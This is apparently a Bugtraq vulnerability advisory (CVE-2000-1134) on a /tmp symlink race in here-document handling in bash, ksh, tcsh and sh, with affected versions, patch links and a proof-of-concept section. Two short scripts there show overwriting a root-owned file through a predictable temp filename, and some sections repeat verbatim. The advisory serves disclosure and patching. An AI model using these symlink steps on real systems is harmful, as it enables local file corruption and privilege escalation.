Unix Shell Redirection Race Condition Vulnerability
BID:2006
Info
Unix Shell Redirection Race Condition Vulnerability
| Bugtraq ID: | 2006 |
| Class: | Race Condition Error |
| CVE: |
CVE-2000-1134 |
| Remote: | No |
| Local: | Yes |
| Published: | Jan 02 2000 12:00AM |
| Updated: | Jul 11 2009 03:56AM |
| Credit: | This issue for bash and ksh was discovered and posted to BugTraq by Paul Szabo <[email protected]>. The tcsh variation was posted to BugTraq by proton <[email protected]>. This vulnerability was originally discovered by Gordon Irlam. |
| Vulnerable: |
Wirex Immunix OS 6.2 tcsh tcsh 6.9 .00 tcsh tcsh 6.8 .00 tcsh tcsh 6.7.2 SuSE Linux 7.0 Sun Solaris 2.5.1 _x86 Sun Solaris 2.5.1 Sun Solaris 8_x86 Sun Solaris 8_sparc Sun Solaris 7.0_x86 Sun Solaris 7.0 Sun Solaris 2.6_x86 Sun Solaris 2.6 Sun Solaris 2.5_x86 Sun Solaris 2.5 Sun Cobalt RaQ4 RAID 3100R Sun Cobalt RaQ4 Japanese RAID 3100R-ja Sun Cobalt RaQ4 3001R Sun Cobalt RaQ XTR Japanese 3500R-ja Sun Cobalt RaQ XTR 3500R Sun Cobalt RaQ XTR Sun Cobalt RaQ 4 Sun Cobalt Qube3 w/Caching 4010WG Sun Cobalt Qube3 w/ Caching and RAID 4100WG Sun Cobalt Qube3 Japanese w/Caching 4010WGJ Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ Sun Cobalt Qube3 Japanese 4000WGJ Sun Cobalt Qube3 4000WG Sun Cobalt Qube 3 SGI IRIX 6.5.13 m SGI IRIX 6.5.13 f SGI IRIX 6.5.13 SGI IRIX 6.5.12 m SGI IRIX 6.5.12 f SGI IRIX 6.5.12 SGI IRIX 6.5.11 m SGI IRIX 6.5.11 f SGI IRIX 6.5.11 SGI IRIX 6.5.10 m SGI IRIX 6.5.10 f SGI IRIX 6.5.10 SGI IRIX 6.5.9 SGI IRIX 6.5.8 SGI IRIX 6.5.7 SGI IRIX 6.5.6 SGI IRIX 6.5.5 SGI IRIX 6.5.4 SGI IRIX 6.5.3 SGI IRIX 6.5.2 SGI IRIX 6.5.1 SGI IRIX 6.5 SCO Open Server 5.0.6 a SCO Open Server 5.0.6 SCO Open Server 5.0.5 SCO Open Server 5.0.4 SCO Open Server 5.0.3 SCO Open Server 5.0.2 SCO Open Server 5.0.1 SCO Open Server 5.0 SCO eServer 2.3 SCO eDesktop 2.4 Redhat Linux 6.2 E sparc Redhat Linux 6.2 E i386 Redhat Linux 6.2 E alpha Redhat Linux 6.2 sparc Redhat Linux 6.2 i386 Redhat Linux 6.2 alpha Redhat Linux 6.1 sparc Redhat Linux 6.1 i386 Redhat Linux 6.1 alpha Redhat Linux 6.0 sparc Redhat Linux 6.0 alpha Redhat Linux 6.0 Redhat Linux 5.2 sparc Redhat Linux 5.2 i386 Redhat Linux 5.2 alpha Redhat bash-1.14.7-22.i386.rpm Redhat bash-1.14.7-16.i386.rpm Redhat bash-1.14.7-13.i386.rpm Netscape Communicator 6.01a Mandriva Linux Mandrake 7.2 Mandriva Linux Mandrake 7.1 Mandriva Linux Mandrake 7.0 Mandriva Linux Mandrake 6.1 Mandriva Linux Mandrake 6.0 HP HP-UX 11.11 HP HP-UX 11.0 4 HP HP-UX 11.0 HP HP-UX 10.20 HP HP-UX 9.0 FreeBSD FreeBSD 5.0 FreeBSD FreeBSD 4.2 FreeBSD FreeBSD 3.5.1 Digital (Compaq) TRU64/DIGITAL UNIX 5.0 Compaq Tru64 5.1 a Compaq Tru64 5.1 Compaq Tru64 5.0 a Compaq Tru64 5.0 Compaq Tru64 4.0 g Compaq Tru64 4.0 f Compaq Tru64 4.0 d Caldera OpenLinux Desktop 2.3 Apple Mac OS X 10.0.4 Apple Mac OS X 10.0.3 Apple Mac OS X 10.0.2 Apple Mac OS X 10.0.1 Apple Mac OS X 10.0 |
| Not Vulnerable: |
Sun Solaris 8_sparc SGI IRIX 6.5.14 m SGI IRIX 6.5.14 f SGI IRIX 6.5.14 IBM AIX 4.3.3 HP HP-UX 11.0 Apple Mac OS X 10.1 |
Discussion
Unix Shell Redirection Race Condition Vulnerability
bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files.
A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges.
Scripts and command line operations using << as a redirection operator create files in the /tmp directory with a predictable naming convention. Additionally, files are created in the /tmp directory without first checking if the file already exists.
This could result in a symbolic link attack that could be used to corrupt any file that the owner of the redirecting shell has access to write to. This issue affects those systems running vulnerable versions of bash, tcsh, cash, ksh and sh.
ksh is reportedly not vulnerable for IBM AIX systems.
bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files.
A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges.
Scripts and command line operations using << as a redirection operator create files in the /tmp directory with a predictable naming convention. Additionally, files are created in the /tmp directory without first checking if the file already exists.
This could result in a symbolic link attack that could be used to corrupt any file that the owner of the redirecting shell has access to write to. This issue affects those systems running vulnerable versions of bash, tcsh, cash, ksh and sh.
ksh is reportedly not vulnerable for IBM AIX systems.
Exploit / POC
Unix Shell Redirection Race Condition Vulnerability
This example was contributed by Paul Szabo <[email protected]> :
#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*
This example was submitted by proton <[email protected]> in an October 29th, 2001 BugTraq posting:
/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 ->
rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#
Zenith Parsec <[email protected]> submitted an exploit for bash on Linux systems.
This example was contributed by Paul Szabo <[email protected]> :
#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*
This example was submitted by proton <[email protected]> in an October 29th, 2001 BugTraq posting:
/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 ->
rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#
Zenith Parsec <[email protected]> submitted an exploit for bash on Linux systems.
Solution / Fix
Unix Shell Redirection Race Condition Vulnerability
Solution:
HP have released a security bulletin to address this issue in HP-UX. Customers who are affected by this issue are advised to apply appropriate patches as soon as possible. See referenced advisory for further detail regarding applying fixes. This bulletin has been revised to include fixes for HP-UX 11.04.
Sun has released an alert containing fixes to address this issue.
Sun has also released fixes for RaQ4, Qube3 and RaQXTR.
Various upgrades and patches have been made available:
Sun Cobalt RaQ4 Japanese RAID 3100R-ja
Sun Cobalt RaQ 4
Redhat bash-1.14.7-16.i386.rpm
Redhat bash-1.14.7-22.i386.rpm
Sun Solaris 8_sparc
Sun Solaris 2.5
Sun Cobalt Qube3 4000WG
Sun Cobalt Qube3 w/ Caching and RAID 4100WG
Sun Cobalt RaQ4 3001R
Sun Solaris 2.6
Sun Cobalt RaQ XTR 3500R
Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
Redhat bash-1.14.7-13.i386.rpm
Sun Cobalt RaQ XTR Japanese 3500R-ja
Sun Solaris 2.5_x86
Sun Cobalt Qube3 w/Caching 4010WG
Sun Solaris 2.6_x86
Sun Cobalt RaQ XTR
Sun Cobalt Qube3 Japanese 4000WGJ
Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
Sun Solaris 7.0
Sun Cobalt Qube 3
Sun Solaris 7.0_x86
Sun Solaris 8_x86
HP HP-UX 10.20
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 11.11
Caldera OpenLinux Desktop 2.3
SCO eServer 2.3
SCO eDesktop 2.4
Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1
FreeBSD FreeBSD 3.5.1
Compaq Tru64 4.0 f
Compaq Tru64 4.0 g
Compaq Tru64 4.0 d
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 5.0
Compaq Tru64 5.0
Compaq Tru64 5.0 a
SCO Open Server 5.0
SCO Open Server 5.0.1
SCO Open Server 5.0.3
SCO Open Server 5.0.4
SCO Open Server 5.0.5
SCO Open Server 5.0.6 a
SCO Open Server 5.0.6
Compaq Tru64 5.1 a
Compaq Tru64 5.1
Redhat Linux 5.2 alpha
Redhat Linux 5.2 i386
Redhat Linux 5.2 sparc
Redhat Linux 6.0 alpha
Redhat Linux 6.0
Mandriva Linux Mandrake 6.0
Redhat Linux 6.0 sparc
Redhat Linux 6.1 sparc
Redhat Linux 6.1 alpha
Redhat Linux 6.1 i386
Mandriva Linux Mandrake 6.1
Redhat Linux 6.2 alpha
Redhat Linux 6.2 E alpha
Redhat Linux 6.2 i386
Redhat Linux 6.2 E i386
Redhat Linux 6.2 E sparc
Wirex Immunix OS 6.2
Redhat Linux 6.2 sparc
SGI IRIX 6.5
SGI IRIX 6.5.1
SGI IRIX 6.5.10
SGI IRIX 6.5.10 m
SGI IRIX 6.5.10 f
SGI IRIX 6.5.11
SGI IRIX 6.5.11 m
SGI IRIX 6.5.11 f
SGI IRIX 6.5.12 f
SGI IRIX 6.5.12 m
SGI IRIX 6.5.12
SGI IRIX 6.5.13 f
SGI IRIX 6.5.13 m
SGI IRIX 6.5.2
SGI IRIX 6.5.3
SGI IRIX 6.5.4
SGI IRIX 6.5.5
SGI IRIX 6.5.6
SGI IRIX 6.5.7
SGI IRIX 6.5.8
tcsh tcsh 6.7.2
tcsh tcsh 6.8 .00
tcsh tcsh 6.9 .00
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.2
Solution:
HP have released a security bulletin to address this issue in HP-UX. Customers who are affected by this issue are advised to apply appropriate patches as soon as possible. See referenced advisory for further detail regarding applying fixes. This bulletin has been revised to include fixes for HP-UX 11.04.
Sun has released an alert containing fixes to address this issue.
Sun has also released fixes for RaQ4, Qube3 and RaQXTR.
Various upgrades and patches have been made available:
Sun Cobalt RaQ4 Japanese RAID 3100R-ja
-
Sun RaQ4-All-Security-2.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-All-Security-2.0. 1-16602.pkg
Sun Cobalt RaQ 4
-
Sun RaQ4-All-Security-2.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-All-Security-2.0. 1-16602.pkg
Redhat bash-1.14.7-16.i386.rpm
-
Red Hat Inc. 6.2 i386 bash-1.14.7-23.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm
Redhat bash-1.14.7-22.i386.rpm
-
Red Hat Inc. 6.2 i386 bash-1.14.7-23.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm
Sun Solaris 8_sparc
-
Sun 109324-03
For sh.
http://sunsolve.sun.com -
Sun 110898-02
For csh.
http://sunsolve.sun.com -
Sun 110943-01
http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=110943&rev=01
Sun Solaris 2.5
-
Sun 102982-04
For csh.
http://sunsolve.sun.com -
Sun 103253-10
For ksh.
http://sunsolve.sun.com
Sun Cobalt Qube3 4000WG
-
Sun Qube3-All-Security-4.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0 .1-16602.pkg
Sun Cobalt Qube3 w/ Caching and RAID 4100WG
-
Sun Qube3-All-Security-4.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0 .1-16602.pkg
Sun Cobalt RaQ4 3001R
-
Sun RaQ4-All-Security-2.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-All-Security-2.0. 1-16602.pkg
Sun Solaris 2.6
-
Sun 106361-12
For csh.
http://sunsolve.sun.com -
Sun 106361-13
For sh.
http://sunsolve.sun.com
Sun Cobalt RaQ XTR 3500R
-
Sun RaQXTR-All-Security-1.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/raqxtr/eng/RaQXTR-All-Security- 1.0.1-16602.pkg
Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
-
Sun Qube3-All-Security-4.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0 .1-16602.pkg
Redhat bash-1.14.7-13.i386.rpm
-
Red Hat Inc. 5.2 i386 bash-1.14.7-23.5x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bash-1.14.7-23.5x.i386.rpm
Sun Cobalt RaQ XTR Japanese 3500R-ja
-
Sun RaQXTR-All-Security-1.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/raqxtr/eng/RaQXTR-All-Security- 1.0.1-16602.pkg
Sun Solaris 2.5_x86
-
Sun 102983-04
For csh.
http://sunsolve.sun.com -
Sun 103254-10
http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=103254&rev=10
Sun Cobalt Qube3 w/Caching 4010WG
-
Sun Qube3-All-Security-4.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0 .1-16602.pkg
Sun Solaris 2.6_x86
-
Sun 106362-12
For csh.
http://sunsolve.sun.com -
Sun 106362-13
For sh.
http://sunsolve.sun.com
Sun Cobalt RaQ XTR
-
Sun RaQXTR-All-Security-1.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/raqxtr/eng/RaQXTR-All-Security- 1.0.1-16602.pkg
Sun Cobalt Qube3 Japanese 4000WGJ
-
Sun Qube3-All-Security-4.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0 .1-16602.pkg
Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
-
Sun Qube3-All-Security-4.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0 .1-16602.pkg
Sun Solaris 7.0
-
Sun 108162-04
For sh.
http://sunsolve.sun.com -
Sun 108416-02
http://sunsolve.sun.com -
Sun 108574-03
For csh.
http://sunsolve.sun.com
Sun Cobalt Qube 3
-
Sun Qube3-All-Security-4.0.1-16602.pkg
http://ftp.cobalt.sun.com/pub/packages/qube3/ml/Qube3-All-Security-4.0 .1-16602.pkg
Sun Solaris 7.0_x86
-
Sun 108163-04
For sh.
http://sunsolve.sun.com -
Sun 108417-02
http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=108417&rev=02 -
Sun 108575-03
For csh.
http://sunsolve.sun.com
Sun Solaris 8_x86
-
Sun 109325-03
For sh.
http://sunsolve.sun.com -
Sun 110899-02
For csh.
http://sunsolve.sun.com -
Sun 110944-01
http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=110944&rev=01
HP HP-UX 10.20
-
HP PHCO_27803
http://itrc.hp.com -
HP PHCO_27804
http://itrc.hp.com -
HP PHCO_27819
http://itrc.hp.com
HP HP-UX 11.0 4
-
HP PHCO_29698
http://itrc.hp.com -
HP PHCO_29702
http://itrc.hp.com -
HP PHCO_29814
http://itrc.hp.com
HP HP-UX 11.0
-
HP PHCO_27344
http://itrc.hp.com -
HP PHCO_27418
http://itrc.hp.com -
HP PHCO_27763
http://itrc.hp.com
HP HP-UX 11.11
-
HP PHCO_26561
http://itrc.hp.com -
HP PHCO_27019
http://itrc.hp.com -
HP PHCO_27345
http://itrc.hp.com
Caldera OpenLinux Desktop 2.3
-
Caldera Desktop 2.3 bash-1.14.7-14.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/ba sh-1.14.7-14.i386.rpm
SCO eServer 2.3
-
Caldera eServer 2.3 bash-1.14.7-14.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/bash -1.14.7-14.i386.rpm
SCO eDesktop 2.4
-
Caldera eDesktop 2.4 bash-1.14.7-14.i386.rpm
ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
Sun Solaris 2.5.1 _x86
-
Sun 103868-04
For sh.
http://sunsolve.sun.com -
Sun 103892-08
http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=103892&rev=08 -
Sun 104737-05
For csh.
http://sunsolve.sun.com
Sun Solaris 2.5.1
-
Sun 103867-04
For sh.
http://sunsolve.sun.com -
Sun 103891-08
For ksh.
http://sunsolve.sun.com -
Sun 104736-05
For csh.
http://sunsolve.sun.com
FreeBSD FreeBSD 3.5.1
-
FreeBSD ports-3 i386 bash-1.14.7.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/shells/ bash-1.14.7.tgz
Compaq Tru64 4.0 f
-
Compaq duv40fb17-c0061801-12860-e-20020115
http://ftp1.support.compaq.com/public/unix/v4.0f/duv40fb17-c0061801-12 860-e-20020115.README -
Compaq duv40fb18-c0065000-12930-e-20020122
http://ftp1.support.compaq.com/public/unix/v4.0f/duv40fb18-c0065000-12 930-e-20020122.README
Compaq Tru64 4.0 g
-
Compaq t64v40gb17-c0009303-12856-e-20020115
http://ftp1.support.compaq.com/public/unix/v4.0g/t64v40gb17-c0009303-1 2856-e-20020115.README
Compaq Tru64 4.0 d
-
Compaq duv40db17-c0061401-12858-e-20020115
http://ftp1.support.compaq.com/public/unix/v4.0d/duv40db17-c0061401-12 858-e-20020115.README
FreeBSD FreeBSD 4.2
-
FreeBSD ports-4 alpha bash-1.14.7.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/shells /bash-1.14.7.tgz -
FreeBSD ports-4 i386 bash-1.14.7.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/shells/ bash-1.14.7.tgz
FreeBSD FreeBSD 5.0
-
FreeBSD ports-5 alpha bash-1.14.7.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/shell s/bash-1.14.7.tgz -
FreeBSD ports-5 i386 bash-1.14.7.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/shells /bash-1.14.7.tgz
Compaq Tru64 5.0
-
Compaq t64v50b17-c0006900-12861-e-20020115
http://ftp1.support.compaq.com/public/unix/v5.0/t64v50b17-c0006900-128 61-e-20020115.README
Compaq Tru64 5.0 a
-
Compaq t64v50ab17-c0017601-12862-e-20020115
http://ftp1.support.compaq.com/public/unix/v5.0a/t64v50ab17-c0017601-1 2862-e-20020115.README
SCO Open Server 5.0
-
SCO OpenServer shells.tar.Z
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/
SCO Open Server 5.0.1
-
SCO OpenServer shells.tar.Z
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/
SCO Open Server 5.0.3
-
SCO OpenServer shells.tar.Z
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/
SCO Open Server 5.0.4
-
SCO OpenServer shells.tar.Z
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/
SCO Open Server 5.0.5
-
SCO OpenServer shells.tar.Z
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/
SCO Open Server 5.0.6 a
-
SCO OpenServer shells.tar.Z
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/
SCO Open Server 5.0.6
-
SCO OpenServer shells.tar.Z
ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.24/
Compaq Tru64 5.1 a
-
Compaq t64v51ab1-c0008900-12954-e-20020124
http://ftp.support.compaq.com/patches/public/unix/v5.1a/t64v51ab1-c000 8900-12954-e-20020124.README
Compaq Tru64 5.1
-
Compaq t64v51b17-c0095501-12931-e-20020122
http://ftp1.support.compaq.com/public/unix/v5.1/t64v51b17-c0095501-129 31-e-20020122.README -
Compaq t64v51b18-c0094800-12864-e-20020115
http://ftp1.support.compaq.com/public/unix/v5.1/t64v51b18-c0094800-128 64-e-20020115.README
Redhat Linux 5.2 alpha
-
Red Hat Inc. 5.2 alpha bash-1.14.7-23.5x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/bash-1.14.7-23.5x.alpha.rpm
Redhat Linux 5.2 i386
-
Red Hat Inc. 5.2 i386 bash-1.14.7-23.5x.i386.rpm
ftp://updates.redhat.com/5.2/i386/bash-1.14.7-23.5x.i386.rpm
Redhat Linux 5.2 sparc
-
Red Hat Inc. 5.2 sparc bash-1.14.7-23.5x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/bash-1.14.7-23.5x.sparc.rpm
Redhat Linux 6.0 alpha
-
Red Hat Inc. 6.2 alpha bash-1.14.7-23.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm
Redhat Linux 6.0
-
Red Hat Inc. 6.2 i386 bash-1.14.7-23.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm
Mandriva Linux Mandrake 6.0
-
MandrakeSoft 6.0 i386 bash1-1.14.7-19.1mdk.i586.rpm
http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/6.0/RPMS/ bash1-1.14.7-19.1mdk.i586.rpm
Redhat Linux 6.0 sparc
-
Red Hat Inc. 6.2 sparc bash-1.14.7-23.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm
Redhat Linux 6.1 sparc
-
Red Hat Inc. 6.2 sparc bash-1.14.7-23.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm
Redhat Linux 6.1 alpha
-
Red Hat Inc. 6.2 alpha bash-1.14.7-23.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm
Redhat Linux 6.1 i386
-
Red Hat Inc. 6.2 i386 bash-1.14.7-23.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm
Mandriva Linux Mandrake 6.1
-
MandrakeSoft 6.1 i386 bash1-1.14.7-19.1mdk.i586.rpm
http://sunsite.ualberta.ca/pub/Mirror/Linux/mandrake/updates/6.1/RPMS/ bash1-1.14.7-19.1mdk.i586.rpm
Redhat Linux 6.2 alpha
-
Red Hat Inc. 6.2 alpha bash-1.14.7-23.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm
Redhat Linux 6.2 E alpha
-
Red Hat Inc. 6.2 alpha bash-1.14.7-23.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/bash-1.14.7-23.6x.alpha.rpm
Redhat Linux 6.2 i386
-
Red Hat Inc. 6.2 i386 bash-1.14.7-23.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm
Redhat Linux 6.2 E i386
-
Red Hat Inc. 6.2 i386 bash-1.14.7-23.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/bash-1.14.7-23.6x.i386.rpm
Redhat Linux 6.2 E sparc
-
Red Hat Inc. 6.2 sparc bash-1.14.7-23.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm
Wirex Immunix OS 6.2
-
Wirex 6.2 i386 bash-1.14.7-23.6x_StackGuard.i386.rpm
http://www.immunix.org/ImmunixOS/6.2/updates/RPMS/bash-1.14.7-23.6x_St ackGuard.i386.rpm
Redhat Linux 6.2 sparc
-
Red Hat Inc. 6.2 sparc bash-1.14.7-23.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/bash-1.14.7-23.6x.sparc.rpm
SGI IRIX 6.5
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.1
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.10
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.10 m
SGI IRIX 6.5.10 f
SGI IRIX 6.5.11
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.11 m
SGI IRIX 6.5.11 f
SGI IRIX 6.5.12 f
SGI IRIX 6.5.12 m
SGI IRIX 6.5.12
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.13 f
SGI IRIX 6.5.13 m
SGI IRIX 6.5.2
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.3
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.4
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.5
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.6
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.7
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
SGI IRIX 6.5.8
-
SGI IRIX 6.5.14 Maintenance Release
http://support.sgi.com/colls/patches/tools/relstream/index.html
tcsh tcsh 6.7.2
-
Debian 2.2 (Intel): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh- kanji_6.09.00-10_i386.deb -
Debian 2.2 (Intel): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-i386/tcsh_ 6.09.00-10_i386.deb -
Debian 2.2 (m68k): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh- kanji_6.09.00-10_m68k.deb -
Debian 2.2 (m68k): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-m68k/tcsh_ 6.09.00-10_m68k.deb -
Debian 2.2 (ppc): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-powerpc/tc sh-kanji_6.09.00-10_powerpc.deb -
Debian 2.2 (ppc): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-powerpc/tc sh_6.09.00-10_powerpc.deb -
Debian 2.2 (Sparc): tcsh-kanji_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh -kanji_6.09.00-10_sparc.deb -
Debian 2.2 (Sparc): tcsh_6.09.00-10
http://security.debian.org/dists/stable/updates/main/binary-sparc/tcsh _6.09.00-10_sparc.deb -
Debian 2.2 alpha tcsh-kanji_6.09.00-10_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh -kanji_6.09.00-10_alpha.deb -
Debian 2.2 alpha tcsh_6.09.00-10_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/tcsh _6.09.00-10_alpha.deb -
Debian 2.2 arm tcsh-kanji_6.09.00-10_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh-k anji_6.09.00-10_arm.deb -
Debian 2.2 arm tcsh_6.09.00-10_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/tcsh_6 .09.00-10_arm.deb -
Trustix 1.0/1.1 tcsh-6.09-5tr.i586
ftp://ftp.trustix.net/pub/Trustix/updates/tcsh-6.09-5tr.i586.rpm
tcsh tcsh 6.8 .00
-
Conectiva 4.0 i386 tcsh-6.08.00-7cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/tcsh-6.08.00-7cl.i386.rpm -
Conectiva 4.0es i386 tcsh-6.08.00-7cl
ftp://atualizacoes.conectiva.com.br/4.0es/i386/tcsh-6.08.00-7cl.i386.r pm -
Conectiva 4.1 i386 tcsh-6.09.00-7cl
ftp://atualizacoes.conectiva.com.br/4.1/i386/tcsh-6.09.00-7cl.i386.rpm -
Conectiva 4.2 i386 tcsh-6.09.00-7cl
ftp://atualizacoes.conectiva.com.br/4.2/i386/tcsh-6.09.00-7cl.i386.rpm -
Conectiva 5.0 i386 tcsh-6.09.00-7cl
ftp://atualizacoes.conectiva.com.br/5.0/i386/tcsh-6.09.00-7cl.i386.rpm -
Conectiva 5.1 i386 tcsh-6.09.00-7cl
ftp://atualizacoes.conectiva.com.br/5.1/i386/tcsh-6.09.00-7cl.i386.rpm -
